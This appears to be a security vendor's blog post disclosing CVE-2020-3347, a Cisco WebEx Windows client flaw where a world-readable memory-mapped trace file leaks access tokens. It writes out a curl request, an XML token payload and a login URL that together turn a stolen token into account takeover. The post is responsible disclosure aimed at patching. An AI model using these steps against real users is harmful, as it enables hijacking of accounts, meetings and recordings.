CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Cisco WebEx Memory for the Taking: CVE-2020-3347

Overview

Due to the global pandemic of COVID-19, there’s been an explosion of video conferencing and messaging software usage to help people transition their work-life to a work from home environment. Vulnerabilities in this type of software now present an even greater risk to its users. Cisco WebEx is one of the most popular video conferencing solutions available, so I decided to turn my research skills to see how secure the platform is. While I did find a relatively severe memory information leakage vulnerability, we worked with Cisco through our responsible disclosure program to get this vulnerability patched.

Cisco WebEx Memory Vulnerability: CVE-2020-3347

The following applies to Cisco Webex Meetings client on Windows, version 40.4.12.8:

AboutCiscoWebExMeetings

Once the application is installed, it adds a tray app that is started once a user logs on and has some dependent processes launched as well at that time. If a user has configured the client to log in automatically (default case), the following applies.

The client has several memory-mapped files (sections in Windows terms) open and some are not protected from opening for reading/writing by any other Windows user. Specifically, there is a section called:

\Sessions\\BaseNamedObjects\WBXTRA_TRACE_FILE_EX

Image002

 

Based on the file name, it appears to hold some trace information. Malicious users can open and dump the contents of this file if they can logon to the machine. Simply put, another user can loop over sessions and try to open, read, and save interesting content for future inspection.

I found that the file always contains the following sensitive information:

  • E-mail account used as a login
  • URL used to host meetings

When a user starts a meeting, the trace file will also contain a WebExAccessToken which allows anyone to impersonate the user and get access to the WebEx account.

A POC program provided in the advisory opens the memory mapped file for reading and dumps its contents to disk. Once the victim starts a meeting, the dump will contain something like this:

Bearer

 

All the attacker needs to do now is to grab the Bearer token from the dump file and use it in the following HTTP POST request:

curl -d @get_token.xml -O https://homeabc.my.webex.com/WBXService/XMLService

Contents of get_token.xml file:

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<header>
<securityContext>
<webExID>user@host.name</webExID>
<partnerID>PT</partnerID>
<siteName>home-abc.my</siteName>
<clientInfo>CiscoWebexMeetings-Win/40.6.2</clientInfo>
<webExAccessToken>
eyJhbGci...
</webExAccessToken>
</securityContext>
</header>
<body>
<bodyContent xsi:type="java:com.webex.service.binding.user.GetLoginTicket"></bodyContent>
</body>
</serv:message>

In response a one-time login ticket will arrive:

Image004

The next step is to open the following URL in a browser to get control of the victim’s account:

https://home-abc.my.webex.com//home-abc.my/mywebex/tool/frame/mywebexframe.php?MWAT=mw&strUserName=user%40host.name&TK=b30866fa388c26cf5efda0cd6dfee20b8a60163123bddcbfafb46c54700f2448&UTF8=1&SubMenu=PTPMR

 

The token in red comes from the above SOAP request that uses WebAccessToken from the dump.

Voilà:

Image005

 

Using the leaked information, I was able to access my own account from another machine with a different IP address. It allowed me to see all meetings along with invited parties and meeting password (if set), download past meeting recordings, and so on. Here's the entire attack:

 

Summary

In an attack scenario, any malicious local user or malicious process running on a computer where WebEx Client for Windows is installed can monitor the memory mapped file for a login token. Once found the token, like any leaked credentials, can be transmitted somewhere so that it can be used to login to the WebEx account in question, download Recordings, view/edit Meetings, etc.

Users of Cisco WebEx for Windows are recommended to upgrade to version 40.6.0 or the most current version as soon as possible.

Reference

Trustwave Advisory: TWSL2020-003:
Cisco Advisory for CVE-2020-3347: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Latest SpiderLabs Blogs

Fake Dialog Boxes to Make Malware More Convincing

Let’s explore how SpiderLabs created and incorporated user prompts, specifically Windows dialog boxes into its malware loader to make it more convincing to phishing targets during a Red Team...

Read More

The Secret Cipher: Modern Data Loss Prevention Solutions

This is Part 7 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here. Far too many organizations place Data Loss Prevention (DLP) and Data...

Read More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

UPDATE: Palo Alto Networks confirmed on Tuesday (4/16) that disabling device telemetry is no longer considered an effective mitigation. On Wednesday (4/17), the company released new threat signatures...

Read More